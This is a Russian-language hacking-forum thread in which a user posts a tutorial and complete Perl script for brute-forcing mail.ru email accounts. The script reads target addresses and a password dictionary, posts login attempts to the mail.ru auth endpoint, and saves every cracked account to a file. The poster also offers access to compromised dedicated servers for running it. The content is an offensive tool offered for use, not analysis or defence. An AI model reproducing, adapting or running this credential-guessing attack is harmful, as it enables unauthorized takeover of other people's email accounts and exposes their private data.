Взлом mail.ru - perl брут

Discussion in 'Уязвимости Mail-сервисов' started by tickhack, 25 Jan 2012.

  1. tickhack

    tickhack New Member

    Joined:
    24 Jan 2012
    Messages:
    11
    Likes Received:
    4
    Reputations:
    -10
    Взломать аккаунт на mail.ru довольно просто, самый простой способ это перебор паролей по словарю)

    Данный брут написан на языке Perl поэтому перед тем как читать дальше скачайте и установите Active Perl по адресу http://www.activestate.com/activeperl/

    Сделано? Отлично...
    Теперь создайте отдельную папку в которой будем создавать скрипт и создайте в этой папке пустые файлы перечисленные ниже:
    Code:
    brute-mail.txt 
     mail.txt 
     pass.txt 
     log.txt
    Теперь в файл mail.txt напишите встолбик адреса мыл на мэил ру которые необходимо ломануть
    В файл pass.txt поместите словарь для брута - в столбик слова или цифры по которым будем подбирать.

    Теперь в этой же папке создайте пустой текстовый файл и поместите в него код написанный ниже:

    Код:
    Code:
    #!/usr/bin/perl 
     
    use LWP::UserAgent; 
     
    print "########## GeNoM- mail.ru bruter v 1.3 ###############\n"; 
     
    my $ua = LWP::UserAgent->new( 
    max_size => 1024, 
    agent => 'kakep brayzer v 9.1.1', 
    timeout => 30, 
    ); 
     
     
     
    $set=0; 
    $setall=0; 
    open email, "<mail.txt"; # в кавычках имя файла в котором будут хранится брутаемые мыла 
    $setting=20; # в начале строки стоит значение 30 оно означает через сколько проверенных паролей 
    # вы получите инфу о состоянии брута-- слишком маленькое значение может привести к переполнению 
    # видеобуфера так что осторожнее  
     
    $time=localtime; 
    print "Start brute in $time"; 
     
     
    while ($mails=<email>) { 
    $mails=~s/\n//; # убираем символ конца строки 
    ($login,$domain)=split(/\@/,$mails); # разбираем мыло на логин и домен 
    if ($log==1){open logg,">>log.txt";print logg "-----Start brute-->$login\@$domain\n";close logg;} 
    open pass, "<pass.txt"; # в кавычках указываем имя файла с паролями 
    print "\n-----Start brute-->$login\@$domain\n\n";  
    open logg,">>log.txt";print logg "\n-----Start brute-->$login\@$domain\n\n";close logg; 
    while ($password=<pass>) { 
    $password=~s/\n//; # убираем символ конца строки 
     
     
    my $req = HTTP::Request->new(POST => 'http://win.mail.ru/cgi-bin/auth'); 
    $req->content("page=&post=&login_from=http://mail.ru/&Login=$login&Domain=$domain&Password=$password"); 
    $req->referer('http://win.mail.ru/cgi-bin/auth'); 
    my $res = $ua->request($req); 
    $yda4a=$res->as_string; 
        
    if ($yda4a=~m/500 Can't connect/==1) {print "$yda4a\n";exit;}         
     
    # выводим текущее состояние брута 
    if ($set==$setting){$time=localtime;$time=substr($time,4,15);print "Send pass->$password  Bcego proBepeHo-->$setall  Time-->$time\n";open logg,">>log.txt";$time=localtime;$time=substr($time,4,15);print logg "Send pass->$password  Bcego proBepeHo-->$setall  Time-->$time\n";close logg;$set=0;} 
     
       
    if ($yda4a=~m/checkcookie/==1) {print "For $login\@$domain password->$password\n"; 
    open brut, ">>brute-mail.txt";print brut "$login\@$domain password->$password\n";close brut;  
    open logg,">>log.txt";print logg "For $login\@$domain password->$password\n";close logg; 
    goto nashol;}    
     
    $set++;    
    $setall++;      
       
    } 
     
    nashol: 
    close pass; 
    } 
    close email;
    Переименуйте этот файл на mail-ru.pl

    Все, брутфорс готов!
    Двойным щелчком запустите mail-ru.pl и в появившемся окне наблюдайте за ходом бручения.
    В файле log.txt будет фиксироваться отчет, а в файле brute-mail.txt будут появляться взломанные мыла.
    Если не получаеться брутить со своего компа попробуйте с дедика если нету дедика стучите в ICQ 101023043 могу дать
    Code:
    [COLOR=Red]Автор статьи TICKHACK[/COLOR]
     
    #1 tickhack, 25 Jan 2012
    Last edited: 25 Jan 2012
  2. [none]

    [none] Banned

    Joined:
    22 Nov 2009
    Messages:
    83
    Likes Received:
    26
    Reputations:
    -6
    ЩОК !
     
    1 person likes this.
  3. tickhack

    tickhack New Member

    Joined:
    24 Jan 2012
    Messages:
    11
    Likes Received:
    4
    Reputations:
    -10
    почему ? :confused:
     
  4. WmMariupol

    WmMariupol Banned

    Joined:
    16 Dec 2011
    Messages:
    1
    Likes Received:
    10
    Reputations:
    0
    Видео бы поэтому сделать было бы интересно посмотреть.